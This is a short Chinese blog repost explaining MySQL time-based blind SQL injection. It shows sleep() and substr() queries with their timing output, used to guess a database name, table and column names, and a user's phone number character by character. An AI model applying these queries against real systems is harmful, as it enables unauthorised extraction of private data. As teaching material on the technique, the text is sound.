mysql基于“时间”的盲注

Posted

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了mysql基于“时间”的盲注相关的知识,希望对你有一定的参考价值。

无需页面报错,根据页面响应时间做判断!

mysql基于时间的盲注
======================================================================================================================================================================
*	猜解库名
	-	下面是猜解正确
	mysql> select sleep(1) from (select database() a_database)a where substr(a_database,1,1)=char(0x66);                                                                             
		+----------+
		| sleep(1) |
		+----------+
		|        0 |
		+----------+
		1 row in set (1.00 sec)

	-	下面是猜解错误
	mysql> select sleep(1) from (select database() a_database)a where substr(a_database,1,1)=char(0x67);
		Empty set (0.00 sec)


*	猜解表名
	-	mysql> select sleep(1) from (select distinct table_name as a_tn from information_schema.tables where table_schema=‘fangjiangjun‘ limit 0,1)a  where substr(a_tn, 1, 1)=‘f‘;
			+----------+
			| sleep(1) |
			+----------+
			|        0 |
			+----------+
			1 row in set (1.00 sec)

	-	mysql> select sleep(1) from (select distinct table_name as a_tn from information_schema.tables where table_schema=‘fangjiangjun‘ limit 0,1)a  where substr(a_tn, 1, 1)=‘x‘;
			Empty set (0.00 sec)


*	猜解字段名
	-	mysql> select sleep(1) from (select distinct column_name as a_cn from information_schema.columns where table_schema=‘fangjiangjun‘ and table_name=‘f_user‘ limit 0,1)a  where substr(a_cn, 1, 1)=‘i‘;
			+----------+
			| sleep(1) |
			+----------+
			|        0 |
			+----------+
			1 row in set (1.01 sec)

	-	mysql> select sleep(1) from (select distinct column_name as a_cn from information_schema.columns where table_schema=‘fangjiangjun‘ and table_name=‘f_user‘ limit 0,1)a  where substr(a_cn, 2, 1)=‘d‘;
			+----------+
			| sleep(1) |
			+----------+
			|        0 |
			+----------+
			1 row in set (1.00 sec)


*	猜解字段值
	-	mysql> select sleep(1) from (select convert(mobile_phone,char) as a_mp from fangjiangjun.f_user order by id limit 0,1)a where substr(a_mp,1,1)=‘1‘;
			+----------+
			| sleep(1) |
			+----------+
			|        0 |
			+----------+
			1 row in set (1.00 sec)

	-	mysql> select sleep(1) from (select convert(mobile_phone,char) as a_mp from fangjiangjun.f_user order by id limit 0,1)a where substr(a_mp,2,1)=‘3‘;
			

	-	mysql> select sleep(1) from (select convert(mobile_phone,char) as a_mp from fangjiangjun.f_user order by id limit 0,1)a where substr(a_mp,2,1)=‘8‘;
			+----------+
			| sleep(1) |
			+----------+
			|        0 |
			+----------+
			1 row in set (1.00 sec)

  

以上是关于mysql基于“时间”的盲注的主要内容,如果未能解决你的问题,请参考以下文章

mysql order by基于时间的盲注

sql注入笔记:基于时间延迟的盲注

SQL注入:sqli-labs lesson-8 lesson -9 基于布尔值和基于时间的盲注!

Sqlilab盲注基础

SQL盲注注入

盲注学习总结